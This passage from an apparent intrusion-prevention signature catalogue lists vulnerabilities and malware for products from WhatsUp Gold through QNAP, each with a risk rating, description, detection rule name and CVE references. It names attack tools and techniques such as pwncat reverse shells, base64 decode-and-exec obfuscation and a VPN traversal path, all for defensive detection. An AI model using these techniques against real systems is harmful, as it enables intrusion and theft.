Description: A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the WriteDataFile method. Successfully exploiting this vulnerability could result in arbitrary file creation, possibly allowing remote code execution in the context of a service account without any prior authentication requirements.
Situation: Generic_CS-Progress-WhatsUp-Gold-Potential-Directory-Traversal-CVE-2024-46909
Generic_CS-Progress-WhatsUp-Gold-Directory-Traversal-CVE-2024-46909
References:
CVE-2024-46909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46909
Back to top

Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the WriteDataFile method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of a service account.
Situation: Generic_CS-Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883
References:
CVE-2024-4883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4883
Back to top

Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization

About this vulnerability: A vulnerability in Progress Software WS_FTP Server
Risk: High
First detected in: sgpkg-ips-1637-5242
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Progress Software WS_FTP Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in the Ad Hoc Transfer module of WS_FTP Server. The vulnerability is due to improper validation of form field values in upload requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in arbitrary code execution under the security context of NETWORK SERVICE.
Situation: HTTP_CS-Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization
References:
CVE-2023-40044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40044
Back to top

ProjectSend-Improper-Authentication-CVE-2024-11680

About this vulnerability: An attempt to exploit a vulnerability in ProjectSend detected
Risk: High
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Platform: Generic
Software: ProjectSend
Type: Input Validation
Description: ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to "options.php", enabling unauthorized modification of the application's configuration. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.
Situation: HTTP_CRL-ProjectSend-Improper-Authentication-CVE-2024-11680
References:
CVE-2024-11680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11680
Back to top

PROMOTIC-Directory-Traversal

About this vulnerability: A vulnerability in PROMOTIC
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PROMOTIC
Type: Malfunction
Description: There is a directory traversal vulnerability in PROMOTIC which allows an attacker to download project files and file necessary for decrypting sensitive information.
Situation: HTTP_CSU-PROMOTIC-Directory-Traversal
Back to top

ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability

About this vulnerability: A vulnerability in Netgear ProSafe Management System
Risk: High
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: NetGear NMS300
Type: Insecure Configuration
Description: An arbitrary file upload vulnerability exists in Netgear Management System NMS300. A remote attacker can use this to upload arbitrary files on the affected system, which may lead to arbitrary code execution with SYSTEM privileges.
Situation: HTTP_CSH-ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability
References:
CVE-2016-1524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1524
Back to top

ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow

About this vulnerability: ProSysInfo TFTP Server TFTPDWIN 0.4.2 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ProSysInfo
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier which allows remote attackers to execute arbitrary code, or cause a denial of service condition by sending a long file name.
Situation: TFTP_GE-ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow
References:
CVE-2006-4948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4948
BID-20131
http://www.securityfocus.com/bid/20131
OSVDB-29032
http://www.osvdb.org/29032
Back to top

Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization

About this vulnerability: A vulnerability in Provectus UI for Apache Kafka
Risk: Moderate
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: Provectus UI for Apache Kafka
Type: Input Validation
Description: Insecure access to JMX configuration causes an insecure deserialization vulnerability in Provectus UI for Kafka. A successful exploitation of the vulnerability can allow an attacker to execute arbitrary code in the context of the target application.
Situation: Generic_SS-Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization
References:
CVE-2024-32030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32030
Back to top

Proxy-Pro-Professional-GateKeeper-Buffer-Overflow

About this vulnerability: A Proxy-Pro Professional GateKeeper Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Proxy-Pro Gatekeeper
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Proxy-Pro Professional Gatekeeper, version4.7, which allows remote attackers to execute arbitrary code via a long GET request.
Situation: Generic_MySQL-MaxDB-WebDBM-BOF
References:
CVE-2004-0326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326
BID-9716
http://www.securityfocus.com/bid/9716
OSVDB-4027
http://www.osvdb.org/4027
Back to top

ProZilla-FTPSearch-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the FTPSearch functionality in ProZilla
Risk: Moderate
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: ProZilla
Type: Buffer Overflow
Description: ProZilla is a download accelerator software that has a buffer overflow vulnerability in the handling of malicious responses to FTPSearch requests.
Situation: HTTP_ProZilla-FTPSearch-Buffer-Overflow
References:
CVE-2005-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2961
BID-14993
http://www.securityfocus.com/bid/14993
Back to top

PRTG-CVE-2023-32781-Authenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in PRTG Network Monitor detected
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Platform: Windows
Software: PRTG Network Monitor
Type: Input Validation
Description: A vulnerability in PRTG Network Monitor, versions 23.2.84.1566 and before, which allows remote attackers to upload and execute arbitary files, into arbitrary folders, on a target system using the -debug flag while running the binary. CVE-2023-32781 and CVE-2023-32782.
Situation: HTTP_CS-PRTG-CVE-2023-32781-Authenticated-RCE
References:
CVE-2023-32781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32781
Back to top

PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276

About this vulnerability: A vulnerability in PRTG Network Monitor
Risk: High
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1862-5242
Platform: Windows
Software: PRTG Network Monitor
Type: Input Validation
Description: There exists a vulnerability in PRTG Network Monitor, versions prior to 18.2.39, which allows remote attackers to execute arbitrary code by using a powershell payload through a malicious notification.
Situation: HTTP_CRL-PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276
References:
CVE-2018-9276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9276
Back to top

PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410

About this vulnerability: An attempt to exploit a vulnerability in PRTG Network Monitor detected
Risk: High
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Platform: Generic
Software: PRTG Network Monitor
Type: Malfunction
Description: A local file inclusion vulnerability in PRTG Network Monitor versions before 18.2.40.1683 allows an unauthenticated attacker to create new users arbitrarily. This can be used for creating an attacker-controlled administrator user with read-write privileges.
Situation: HTTP_CSU-PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410
References:
CVE-2018-19410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19410
Back to top

Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability

About this vulnerability: Imagemagick .psd file parsing vulnerability
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Buffer Overflow
Description: ImageMagick Studio LLC's Imagemagick 6.1.0 does not parse .psd images correctly. The number of channels in a .psd file should be limited to 24, and the softwareallocates space for that maximum number of channels. The actual amount of channels in a .psd file is not checked, which results in a buffer overflow when parsing .psd files containing over 24 channels. This allows remote attackers to execute arbitrary code on systems when opening malicious .psd files in Imagemagick.
Situation: HTTP_Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Download
HTTP_CS-Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Upload
File-Binary_Imagemagick-Psd-File-Channel-Buffer-Vulnerability
References:
CVE-2005-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0005
Back to top

PsExec-Named-Pipe-Detected

About this vulnerability: A named pipe used by PsExec was detected
Risk: High
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A named pipe used by PsExec was detected.
Situation: SMB-TCP_PsExec-Named-Pipe-Detected
Back to top

PSO-Proxy-v0.91-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow in PSO Proxy v0.91 Web Server
Risk: High
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PSO Proxy Web Server
Type: Buffer Overflow
Description: A buffer overflow in PSO Proxy v0.91 Web Server which allows a remote attacker to execute arbitrary code, or cause a denial of service, via a long HTTP request.
Situation: HTTP_CS-PSO-Proxy-v0.91-Stack-Buffer-Overflow
References:
CVE-2004-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0313
BID-9706
http://www.securityfocus.com/bid/9706
OSVDB-4028
http://www.osvdb.org/4028
Back to top

PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability: A vulnerability in PTC Arbortext IsoView
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PTC Arbortext IsoView
Type: Buffer Overflow
Description: Multiple stack-based buffer overflow vulnerabilities exist in the PTC IsoView ActiveX Control. These vulnerabilities are caused by insufficient validation of the Object identifier arguments to multiple methods of the ActiveX control. A remote attacker can exploit these vulnerabilities by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.
Situation: File-Text_PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow
References:
CVE-2014-9267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9267
BID-71491
http://www.securityfocus.com/bid/71491
Back to top

PTC-IsoWiew-ActiveX-Control-ViewPort-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in PTC Arbortext IsoView
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PTC Arbortext IsoView
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in the PTC IsoView ActiveX control. The vulnerability is caused by insufficient validation on the ViewPort property value of the ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.
Situation: File-Text_PTC-IsoView-ActiveX-Control-ViewPort-Heap-Buffer-Overflow
References:
CVE-2014-9267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9267
Back to top

Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893

About this vulnerability: A vulnerability in Pulse Connect Secure
Risk: High
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Pulse Secure
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in Pulse Secure. Successful exploitation could lead in arbitrary code execution. This situation blocks access to the URIs listed in the Pulse Secure's advisory SA44784.
Situation: HTTP_CSU-Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893
References:
CVE-2021-22893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22893
Back to top

Pulse-Connect-Secure-Template-Injection

About this vulnerability: An attempt to exploit a vulnerability in Pulse Connect Secure detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Pulse Secure
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Pulse Connect Secure detected.
Situation: HTTP_CRL-Pulse-Connect-Secure-Template-Injection
References:
CVE-2020-8243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243
Back to top

Pulse-Secure-Cross_Site_Script_Inclusion

About this vulnerability: A vulnerability in Pulse Connect Secure
Risk: Moderate
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1296-5242
Platform: Pulse Secure
Software: <os>
Type: Script Injection
Description: There exists a cross-site script inclusion vulnerability in Pulse Secure. Successful exploitation could lead in arbitrary JavaScript execution.
Situation: File-Text_Pulse-Secure-Cross_Site_Script_Inclusion
References:
CVE-2019-11540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11540
Back to top

Pulse-Secure-Diag.cgi-Command-Injection

About this vulnerability: A vulnerability in Pulse Connect Secure
Risk: Moderate
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Pulse Secure
Software: <os>
Type: Input Validation
Description: There exists a post-auth command injection in Pulse Secure. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Pulse-Secure-Diag.cgi-Command-Injection
References:
CVE-2019-11539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539
Back to top

Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218

About this vulnerability: A vulnerability in Pulse Connect Secure
Risk: High
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Pulse Secure
Software: <os>
Type: Input Validation
Description: There exists a post-auth command injection in Pulse Secure. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL_Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218
References:
CVE-2020-8218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8218
Back to top

Pulse-Secure-SSL-VPN-Cross-Site-Scripting

About this vulnerability: A vulnerability in Pulse Secure SSL VPN
Risk: High
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Pulse Secure
Software: <os>
Type: Malfunction
Description: There exists a cross-site scripting vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CSU-Pulse-Secure-SSL-VPN-Cross-Site-Scripting
References:
CVE-2019-11507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11507
Back to top

Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading

About this vulnerability: A vulnerability in Pulse Secure SSL VPN
Risk: High
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Pulse Secure
Software: <os>
Type: Malfunction
Description: There exists a pre-auth file reading vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in system compromise.
Situation: HTTP_CSU-Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading
References:
CVE-2019-11510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
Back to top

Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Pulse Secure SSL VPN
Risk: High
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Pulse Secure
Software: <os>
Type: Malfunction
Description: There exists a stack buffer overflow vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow
References:
CVE-2019-11542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11542
Back to top

Pulse-Secure-VPN-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Pulse Secure VPN
Risk: High
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: Pulse Secure VPN
Type: Input Validation
Description: A vulnerability in Pulse Secure VPN which allows remote attackers to execute arbitrary code due to the lack of proper input validation to diag.cgi.
Situation: HTTP_CSU-Pulse-Secure-VPN-Arbitrary-Command-Execution
References:
CVE-2019-11539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539
Back to top

Pulse-Secure-VPN-Arbitrary-File-Disclosure

About this vulnerability: A vulnerability in Pulse Secure VPN
Risk: High
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1641-5242
Platform: Linux; Unix
Software: Pulse Secure VPN
Type: Directory Traversal
Description: A vulnerability in Pulse Secure VPN which allows remote attackers to gain sensitive information via a directory traversal by specifying /dana/html5acc/guacamole/ in the middle of the path.
References:
CVE-2019-11510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
Back to top

Pulse-Secure-VPN-Gzip-RCE

About this vulnerability: A vulnerability in Pulse Secure VPN.
Risk: High
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Platform: Generic
Software: Pulse Secure VPN
Type: Insecure Configuration
Description: A vulnerability in Pulse Secure VPN, versions before 9.1R9, which allows remote attackers to overwrite aribitrary files resulting in remote code execution, due to uncontrolled gzip extraction.
Situation: HTTP_CS-Pulse-Secure-VPN-Gzip-RCE
References:
CVE-2020-8260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260
Back to top

PurpleFox-EK-Exploit-Redirect-Page

About this vulnerability: PurpleFox Exploit Kit traffic was detected
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Windows
Software: <os>
Type: Javascript Injection
Description: PurpleFox Exploit Kit traffic was detected. An exploit Kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation: File-Text_PurpleFox-EK-Exploit-Redirect-Page
Back to top

Pushbot-Bot

About this vulnerability: Pushbot Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Pushbot is a Bot that allows remote attackers to take control of the infected machine.
Situation: Generic_CS-Pushbot-Bot-Traffic
Back to top

Pushdo-Spambot

About this vulnerability: Pushdo spambot is a Trojan Horse program used as a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Pushdo spambot
Type: Backdoor
Description: Pushdo spambot is a Trojan Horse program used as a template-based spamming engine.
Situation: HTTP_CSU-Pushdo-Spambot
Back to top

pwncat-Traffic

About this vulnerability: pwncat traffic was detected
Risk: High
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: pwncat is a tool allowing to create bind and reverse shells, self-injecting shells and port-forwardings. It's also fully scriptable with Python.
Situation: Generic_TCP-pwncat-Traffic
File-Text_pwncat-Script
Back to top

pyLoad-js2py-Python-Execution

About this vulnerability: A vulnerability in pyLoad.
Risk: Moderate
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Platform: Unix; Linux
Software: pyLoad
Type: Code Injection
Description: A vulnerability in pyLoad, versions prior to 0.5.0b3.dev31, which allows remote attackers to execute arbitrary code by sending a crafted request to the flash/addcrypted2 endpoint, due to the pyimport functionality exposed through the js2py library.
Situation: HTTP_CS-pyLoad-js2py-Python-Execution
References:
CVE-2023-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0297
Back to top

pyLoad-RCE-With-js2py-Sandbox-Escape

About this vulnerability: A vulnerability in Pyload
Risk: High
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Platform: Linux
Software: pyLoad
Type: Misconfiguration
Description: A vulnerability in pyLoad, versions 0.5.0b3.dev85 and before, which allows remote attackers to execute arbitrary commands though the restricted /flash/addcrypted2 API endpoint, by amnipulation of the HOST header.
Situation: HTTP_CS-pyLoad-RCE-With-js2py-Sandbox-Escape
References:
CVE-2024-39205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39205
Back to top

Python-Rot13-File-Encoding

About this vulnerability: Suspicious file encoding in Python 2
Risk: Low
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Python
Type: Insecure Configuration
Description: Many implementations of Python 2 have support for Rot 13 as a file encoder. This may be used to obfuscate code in order to evade content inspection.
Situation: File-Text_Python-Rot13-File-Encoding
Back to top

Python-Script-With-Base64-Obfuscation-Pattern

About this vulnerability: A potentially malicious Python script detected
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: A Python script contains a suspicious obfuscation pattern that is usually used to bypass inspection. The main content is stored as a base64 encoded blob, which is decoded and executed. It has been seen in, for example, an exploitation of CVE-2024-3400.
Situation: File-Text_Python-Script-With-Base64-Obfuscation-Pattern
Back to top

Python-SSL-X.509-Distributionpoint-Extension-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Python Software Foundation Python
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Python
Type: Malfunction
Description: There has been reported a denial of service vulnerability in the Python SSL module. This vulnerability can be exploited by sending a crafted packet to a target server. Successful exploitation can lead to denial of service conditions.
Situation: HTTPS_SS-Python-Ssl-X.509-Distributionpoint-Extension-Null-Pointer-Dereference
References:
CVE-2019-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5010
Back to top

PyTorch-Model-Server-Registration-And-Deserialization-RCE

About this vulnerability: An attempt to exploit a vulnerability in PyTorch detected
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: PyTorch
Type: Insecure Configuration
Description: A vulnerability in PyTorch model server, versions before 0.8.2, which allows remote attackers to register MAR model files from arbitrary servers, which can lead to arbitrary Java code execution.
Situation: HTTP_CSU-PyTorch-Model-Server-Registration-And-Deserialization-RCE
References:
CVE-2023-43654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43654
Back to top

Pyxie-RAT-Infection-Traffic

About this vulnerability: PyXie RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: PyXie RAT infection traffic was detected. TLS decryption might be needed to detect the traffic of PyXie RAT.
Situation: HTTP_CSH-Pyxie-RAT-Infection-Traffic
Back to top

Qakbot-Botnet

About this vulnerability: Qakbot botnet
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1475-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Qakbot is a malicious botnet that is primarily used as banking trojan. Qakbot steals login credentials, such as for online banking websites. It infects web browser processes in order to monitor and modify banking website usage, for example, to ask the users to enter personal information such as additional Transaction Authentication Numbers (TANs).
Situation: HTTP_CRL_Qakbot-Botnet-Traffic
HTTP_CRL-Qakbot-Botnet-Traffic-2
HTTP_CRL-Qakbot-Botnet-Traffic-3
Generic_CS-Qakbot-Botnet-Traffic-4
Back to top

Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow

About this vulnerability: Qbik WinGate WWW Proxy Server 6.1.1.1077 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Qbik WinGate
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Qbik WinGate WWW Proxy Server 6.1.1.1077 which allows remote attackers to execute arbitrary code, or cause a denial of service condition.
Situation: HTTP_CS-Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow
References:
CVE-2006-2926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2926
BID-18312
http://www.securityfocus.com/bid/18312
OSVDB-26214
http://www.osvdb.org/26214
Back to top

qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload

About this vulnerability: A vulnerability in qdPM.
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Linux; Windows
Software: qdPM
Type: Input Validation
Description: A vulnerability in qdPM, versions 9.1 and before, which allows remote attackers to execute arbitrary code by uploading arbitrary php files to the users['photop_preview'] delete photo feature.
Situation: HTTP_CS_qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload
References:
CVE-2020-7246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7246
Back to top

Qemu-Monitor-HMP-Migrate-Command-Execution

About this vulnerability: A vulnerability in QEMU's Monitor Human Monitor Interface (HMP) TCP server.
Risk: High
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Platform: Linux;Unix
Software: QEMU
Type: Input Validation
Description: A vulnerability in QEMU's Monitor Human Monitor Interface (HMP) TCP server, version 6.2.0, which allows remote attackers to execute arbitrary code via the 'migrate' command.
Situation: Generic_CS-Qemu-Monitor-HMP-Migrate-Command-Execution
Back to top

Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference

About this vulnerability: A vulnerability in QEMU QEMU
Risk: Moderate
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: QEMU
Type: Input Validation
Description: A null pointer dereference vulnerability has been found in QEMU vnc. The vulnerability is due to insufficient checking of an initialized buffer. A remote attacker could exploit this vulnerability by setting bits_per_pixel to a value that is less than 8. Successful exploitation could lead to a denial of service condition on the guest VM.
Situation: RFB_CS-Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference
References:
CVE-2014-7815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7815
BID-70998
http://www.securityfocus.com/bid/70998
OSVDB-113748
http://www.osvdb.org/113748
Back to top

Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265

About this vulnerability: A vulnerability in Qlik Sense
Risk: High
First detected in: sgpkg-ips-1660-5242
Last changed: sgpkg-ips-1660-5242
Platform: Generic
Software: Qlik Sense
Type: Malfunction
Description: An HTTP request tunneling vulnerability has been reported in Qlik Sense Enterprise. This vulnerability can be leveraged to send arbitrary requests that get executed by the server. When chained together with CVE-2023-41266, this allows for unauthenticated remote code execution.
Situation: HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265
References:
CVE-2023-41265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41265
Back to top

Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-48365

About this vulnerability: A vulnerability in Qlik Sense
Risk: High
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Platform: Generic
Software: Qlik Sense
Type: Malfunction
Description: An HTTP request tunneling vulnerability has been reported in Qlik Sense Enterprise due to an incomplete fix for CVE-2023-41265. This vulnerability can be leveraged to send arbitrary requests that get executed by the server.
Situation: HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265
References:
CVE-2023-48365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48365
Back to top

Qlik-Sense-Path-Traversal-CVE-2023-41266

About this vulnerability: A vulnerability in Qlik Sense
Risk: High
First detected in: sgpkg-ips-1660-5242
Last changed: sgpkg-ips-1660-5242
Platform: Generic
Software: Qlik Sense
Type: Input Validation
Description: A path traversal vulnerability has been reported in Qlik Sense Enterprise. An unauthenticated attacker can use this vulnerability to send HTTP requests to unauthorised endpoints. When chained together with CVE-2023-41265, this allows for unauthenticated remote code execution.
Situation: HTTP_CSU-Qlik-Sense-Path-Traversal-CVE-2023-41266
References:
CVE-2023-41266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41266
Back to top

QLogic-SANsurfer-FC-HBA-Manager-Directory-Traversal

About this vulnerability: A vulnerability in QLogic SANsurfer FC HBA Manager
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: QLogic SANsurfer FC HBA Manager
Type: Malfunction
Description: There is a directory traversal vulnerability in QLogic SANsurfer FC HBA Manager.
Situation: HTTP_CSU-System-File-Disclosure
Back to top

QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection

About this vulnerability: A vulnerability in QNAP HBS 3 Hybrid Backup Sync
Risk: Moderate
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Platform: Generic
Software: QNAP HBS 3 Hybrid Backup Sync
Type: Input Validation
Description: A command injection vulnerability has been reported in HBS 3 Hybrid Backup Sync. The vulnerability is due to improper validation of user data sent to a device running the vulnerable application. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the admin user.
